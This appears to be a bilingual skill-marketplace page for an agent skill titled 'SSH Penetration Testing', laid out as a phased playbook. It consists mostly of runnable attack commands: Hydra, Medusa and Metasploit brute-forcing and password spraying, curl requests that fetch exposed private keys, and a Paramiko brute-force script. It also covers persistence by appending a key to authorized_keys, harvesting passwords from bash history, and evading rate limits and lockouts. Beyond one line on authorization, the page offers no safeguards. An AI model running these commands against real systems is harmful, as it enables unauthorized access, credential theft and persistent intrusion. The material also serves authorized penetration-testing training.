SSH渗透测试完整指南：安全评估、暴力破解与漏洞利用实战教程

SSH Penetration Testing by automindtechnologie-jpg/ultimate-skill.md

GitHub

安装命令

npx skills add https://github.com/automindtechnologie-jpg/ultimate-skill.md --skill 'SSH Penetration Testing'

自动化测试安全

🇨🇳中文介绍

SSH 渗透测试

目的

执行全面的 SSH 安全评估，包括枚举、凭据攻击、漏洞利用、隧道技术和后渗透活动。此技能涵盖了测试 SSH 服务安全的完整方法。

先决条件

必需工具

带有 SSH 脚本的 Nmap
用于暴力破解的 Hydra 或 Medusa
用于配置分析的 ssh-audit
Metasploit Framework
带有 Paramiko 库的 Python

必备知识

SSH 协议基础
公钥/私钥认证
端口转发概念
Linux 命令行熟练度

输出和交付物

SSH 枚举报告 - 版本、算法、配置
凭据评估 - 弱密码、默认凭据
漏洞评估 - 已知 CVE、配置错误
隧道文档 - 端口转发配置

核心工作流程

阶段 1: SSH 服务发现

识别目标网络上的 SSH 服务：

# 快速 SSH 端口扫描
nmap -p 22 192.168.1.0/24 --open

# 常见备用 SSH 端口
nmap -p 22,2222,22222,2200 192.168.1.100

# SSH 全端口扫描
nmap -p- --open 192.168.1.100 | grep -i ssh

# 服务版本检测
nmap -sV -p 22 192.168.1.100

阶段 2: SSH 枚举

收集 SSH 服务的详细信息：

# 横幅抓取
nc 192.168.1.100 22
# 输出: SSH-2.0-OpenSSH_8.4p1 Debian-5

# Telnet 横幅抓取
telnet 192.168.1.100 22

# 使用脚本的 Nmap 版本检测
nmap -sV -p 22 --script ssh-hostkey 192.168.1.100

# 枚举支持的算法
nmap -p 22 --script ssh2-enum-algos 192.168.1.100

# 获取主机密钥
nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100

# 检查认证方法
nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100

阶段 3: SSH 配置审计

识别弱配置：

# ssh-audit - 全面的 SSH 审计
ssh-audit 192.168.1.100

# 指定端口的 ssh-audit
ssh-audit -p 2222 192.168.1.100

# 输出包括:
# - 算法建议
# - 安全漏洞
# - 加固建议

需要识别的关键配置弱点：

弱密钥交换算法 (diffie-hellman-group1-sha1)
弱密码 (arcfour, 3des-cbc)
弱 MAC (hmac-md5, hmac-sha1-96)
已弃用的协议版本

阶段 4: 凭据攻击

使用 Hydra 暴力破解

# 单一用户名，密码列表
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

# 用户名列表，单一密码
hydra -L users.txt -p Password123 ssh://192.168.1.100

# 用户名和密码列表
hydra -L users.txt -P passwords.txt ssh://192.168.1.100

# 指定端口
hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

# 速率限制规避 (慢速)
hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100

# 详细输出
hydra -l admin -P passwords.txt -vV ssh://192.168.1.100

# 首次成功即退出
hydra -l admin -P passwords.txt -f ssh://192.168.1.100

使用 Medusa 暴力破解

# 基本暴力破解
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh

# 多个目标
medusa -H targets.txt -u admin -P passwords.txt -M ssh

# 使用用户名列表
medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh

# 指定端口
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222

密码喷洒

# 测试多个用户的通用密码
hydra -L users.txt -p Summer2024! ssh://192.168.1.100

# 多个通用密码
for pass in "Password123" "Welcome1" "Summer2024!"; do
    hydra -L users.txt -p "$pass" ssh://192.168.1.100
done

阶段 5: 基于密钥的认证测试

测试弱密钥或暴露的密钥：

# 尝试使用找到的私钥登录
ssh -i id_rsa user@192.168.1.100

# 显式指定密钥 (绕过代理)
ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100

# 强制密码认证
ssh -o PreferredAuthentications=password user@192.168.1.100

# 尝试常见密钥名称
for key in id_rsa id_dsa id_ecdsa id_ed25519; do
    ssh -i "$key" user@192.168.1.100
done

检查暴露的密钥：

# 私钥的常见位置
~/.ssh/id_rsa
~/.ssh/id_dsa
~/.ssh/id_ecdsa
~/.ssh/id_ed25519
/etc/ssh/ssh_host_*_key
/root/.ssh/
/home/*/.ssh/

# 可通过 Web 访问的密钥 (使用 curl/wget 检查)
curl -s http://target.com/.ssh/id_rsa
curl -s http://target.com/id_rsa
curl -s http://target.com/backup/ssh_keys.tar.gz

阶段 6: 漏洞利用

搜索已知漏洞：

# 搜索漏洞利用
searchsploit openssh
searchsploit openssh 7.2

# 常见的 SSH 漏洞
# CVE-2018-15473 - 用户名枚举
# CVE-2016-0777 - 漫游漏洞
# CVE-2016-0778 - 缓冲区溢出

# Metasploit 枚举
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.100
run

# 用户名枚举 (CVE-2018-15473)
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE /usr/share/wordlists/users.txt
run

阶段 7: SSH 隧道和端口转发

本地端口转发

将本地端口转发到远程服务：

# 语法: ssh -L <本地端口>:<远程主机>:<远程端口> 用户@ssh_服务器

# 通过 SSH 访问内部 Web 服务器
ssh -L 8080:192.168.1.50:80 user@192.168.1.100
# 现在访问 http://localhost:8080

# 访问内部数据库
ssh -L 3306:192.168.1.50:3306 user@192.168.1.100

# 多个转发
ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100

远程端口转发

将本地服务暴露给远程网络：

# 语法: ssh -R <远程端口>:<本地主机>:<本地端口> 用户@ssh_服务器

# 将本地 Web 服务器暴露给远程
ssh -R 8080:localhost:80 user@192.168.1.100
# 远程可以通过 localhost:8080 访问

# 反向 shell 回调
ssh -R 4444:localhost:4444 user@192.168.1.100

动态端口转发 (SOCKS 代理)

创建用于网络穿透的 SOCKS 代理：

# 在本地端口 1080 上创建 SOCKS 代理
ssh -D 1080 user@192.168.1.100

# 与 proxychains 一起使用
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn 192.168.1.0/24

# 浏览器配置
# 设置 SOCKS 代理为 localhost:1080

ProxyJump (跳板主机)

通过多个 SSH 服务器链式连接：

# 通过中间主机跳转
ssh -J user1@jump_host user2@target_host

# 多次跳转
ssh -J user1@jump1,user2@jump2 user3@target

# 使用 SSH 配置
# ~/.ssh/config
Host target
    HostName 192.168.2.50
    User admin
    ProxyJump user@192.168.1.100

阶段 8: 后渗透

获取 SSH 访问权限后的活动：

# 检查 sudo 权限
sudo -l

# 查找 SSH 密钥
find / -name "id_rsa" 2>/dev/null
find / -name "id_dsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

# 检查 SSH 目录
ls -la ~/.ssh/
cat ~/.ssh/known_hosts
cat ~/.ssh/authorized_keys

# 添加持久性 (添加你的密钥)
echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys

# 提取 SSH 配置
cat /etc/ssh/sshd_config

# 查找其他用户
cat /etc/passwd | grep -v nologin
ls /home/

# 历史记录中的凭据
cat ~/.bash_history | grep -i ssh
cat ~/.bash_history | grep -i pass

阶段 9: 使用 Paramiko 的自定义 SSH 脚本

基于 Python 的 SSH 自动化：

#!/usr/bin/env python3
import paramiko
import sys

def ssh_connect(host, username, password):
    """尝试使用凭据进行 SSH 连接"""
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    
    try:
        client.connect(host, username=username, password=password, timeout=5)
        print(f"[+] 成功: {username}:{password}")
        return client
    except paramiko.AuthenticationException:
        print(f"[-] 失败: {username}:{password}")
        return None
    except Exception as e:
        print(f"[!] 错误: {e}")
        return None

def execute_command(client, command):
    """通过 SSH 执行命令"""
    stdin, stdout, stderr = client.exec_command(command)
    output = stdout.read().decode()
    errors = stderr.read().decode()
    return output, errors

def ssh_brute_force(host, username, wordlist):
    """使用单词列表暴力破解 SSH"""
    with open(wordlist, 'r') as f:
        passwords = f.read().splitlines()
    
    for password in passwords:
        client = ssh_connect(host, username, password.strip())
        if client:
            # 运行后渗透命令
            output, _ = execute_command(client, 'id; uname -a')
            print(output)
            client.close()
            return True
    return False

# 用法
if __name__ == "__main__":
    target = "192.168.1.100"
    user = "admin"
    
    # 单一凭据测试
    client = ssh_connect(target, user, "password123")
    if client:
        output, _ = execute_command(client, "ls -la")
        print(output)
        client.close()

阶段 10: Metasploit SSH 模块

使用 Metasploit 进行全面的 SSH 测试：

# 启动 Metasploit
msfconsole

# SSH 版本扫描器
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.0/24
run

# SSH 登录暴力破解
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.100
set USERNAME admin
set PASS_FILE /usr/share/wordlists/rockyou.txt
set VERBOSE true
run

# SSH 密钥登录
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.100
set USERNAME admin
set KEY_FILE /path/to/id_rsa
run

# 用户名枚举
use auxiliary/scanner/ssh/ssh_enumusers
set RHOSTS 192.168.1.100
set USER_FILE users.txt
run

# 使用 SSH 会话进行后渗透
sessions -i 1

快速参考

SSH 枚举命令

命令	用途
`nc <主机> 22`	横幅抓取
`ssh-audit <主机>`	配置审计
`nmap --script ssh*`	SSH NSE 脚本
`searchsploit openssh`	查找漏洞利用

暴力破解选项

工具	命令
Hydra	`hydra -l 用户 -P 密码.txt ssh://主机`
Medusa	`medusa -h 主机 -u 用户 -P 密码.txt -M ssh`
Ncrack	`ncrack -p 22 --user admin -P 密码.txt 主机`
Metasploit	`use auxiliary/scanner/ssh/ssh_login`

端口转发类型

类型	命令	用例
本地	`-L 8080:目标:80`	本地访问远程服务
远程	`-R 8080:localhost:80`	远程暴露本地服务
动态	`-D 1080`	用于穿透的 SOCKS 代理

常见 SSH 端口

端口	描述
22	默认 SSH
2222	常见备用端口
22222	另一个备用端口
830	基于 SSH 的 NETCONF

约束和限制

法律考虑

始终获得书面授权
暴力破解可能违反服务条款
记录所有测试活动

技术限制

速率限制可能阻止攻击
Fail2ban 或类似工具可能封禁 IP
基于密钥的认证阻止密码攻击
双因素认证增加了复杂性

规避技术

使用慢速暴力破解: -t 1 -w 5
将攻击分布到多个 IP
谨慎使用基于时间的枚举
尊重锁定阈值

故障排除

问题	解决方案
连接被拒绝	验证 SSH 是否运行；检查防火墙；确认端口；从不同 IP 测试
认证失败	验证用户名；检查密码策略；密钥权限 (600)；authorized_keys 格式
隧道不工作	检查 sshd_config 中的 GatewayPorts/AllowTcpForwarding；验证防火墙；使用 `ssh -v`

每周安装数

仓库

automindtechnol…skill.md

首次出现

1970年1月1日

🇺🇸English

SSH Penetration Testing

Purpose

Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.

Prerequisites

Required Tools

Nmap with SSH scripts
Hydra or Medusa for brute-forcing
ssh-audit for configuration analysis
Metasploit Framework
Python with Paramiko library

Required Knowledge

SSH protocol fundamentals
Public/private key authentication
Port forwarding concepts
Linux command-line proficiency

Outputs and Deliverables

SSH Enumeration Report - Versions, algorithms, configurations
Credential Assessment - Weak passwords, default credentials
Vulnerability Assessment - Known CVEs, misconfigurations
Tunnel Documentation - Port forwarding configurations

Core Workflow

Phase 1: SSH Service Discovery

Identify SSH services on target networks:

# Quick SSH port scan
nmap -p 22 192.168.1.0/24 --open

# Common alternate SSH ports
nmap -p 22,2222,22222,2200 192.168.1.100

# Full port scan for SSH
nmap -p- --open 192.168.1.100 | grep -i ssh

# Service version detection
nmap -sV -p 22 192.168.1.100

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

Command	Purpose
`nc <host> 22`	Banner grabbing
`ssh-audit <host>`	Configuration audit
`nmap --script ssh*`	SSH NSE scripts
`searchsploit openssh`	Find exploits

Type	Command	Use Case
Local	`-L 8080:target:80`	Access remote services locally
Remote	`-R 8080:localhost:80`	Expose local services remotely
Dynamic	`-D 1080`	SOCKS proxy for pivoting

Issue	Solutions
Connection Refused	Verify SSH running; check firewall; confirm port; test from different IP
Authentication Failures	Verify username; check password policy; key permissions (600); authorized_keys format
Tunnel Not Working	Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v`

Tool	Command
Hydra	`hydra -l user -P pass.txt ssh://host`
Medusa	`medusa -h host -u user -P pass.txt -M ssh`
Ncrack	`ncrack -p 22 --user admin -P pass.txt host`
Metasploit	`use auxiliary/scanner/ssh/ssh_login`

Port	Description
22	Default SSH
2222	Common alternate
22222	Another alternate
830	NETCONF over SSH

SSH渗透测试完整指南：安全评估、暴力破解与漏洞利用实战教程

🇨🇳中文介绍

SSH 渗透测试

目的

先决条件

必需工具

必备知识

输出和交付物

核心工作流程

阶段 1: SSH 服务发现

阶段 2: SSH 枚举

阶段 3: SSH 配置审计

阶段 4: 凭据攻击

使用 Hydra 暴力破解

使用 Medusa 暴力破解

密码喷洒

阶段 5: 基于密钥的认证测试

阶段 6: 漏洞利用

阶段 7: SSH 隧道和端口转发

本地端口转发

远程端口转发

动态端口转发 (SOCKS 代理)

ProxyJump (跳板主机)

阶段 8: 后渗透

阶段 9: 使用 Paramiko 的自定义 SSH 脚本

阶段 10: Metasploit SSH 模块

快速参考

SSH 枚举命令

暴力破解选项

端口转发类型

常见 SSH 端口

约束和限制

法律考虑

技术限制

规避技术

故障排除

🇺🇸English

SSH Penetration Testing

Purpose

Prerequisites

Required Tools

Required Knowledge

Outputs and Deliverables

Core Workflow

Phase 1: SSH Service Discovery

相关 Skills

Phase 2: SSH Enumeration

Phase 3: SSH Configuration Auditing

Phase 4: Credential Attacks

Brute-Force with Hydra

Brute-Force with Medusa

Password Spraying

Phase 5: Key-Based Authentication Testing

Phase 6: Vulnerability Exploitation

Phase 7: SSH Tunneling and Port Forwarding

Local Port Forwarding

Remote Port Forwarding

Dynamic Port Forwarding (SOCKS Proxy)

ProxyJump (Jump Hosts)

Phase 8: Post-Exploitation

Phase 9: Custom SSH Scripts with Paramiko

Phase 10: Metasploit SSH Modules

Quick Reference

SSH Enumeration Commands

Brute-Force Options

Port Forwarding Types

Common SSH Ports

Constraints and Limitations

Legal Considerations

Technical Limitations

Evasion Techniques

Troubleshooting

最新 Skills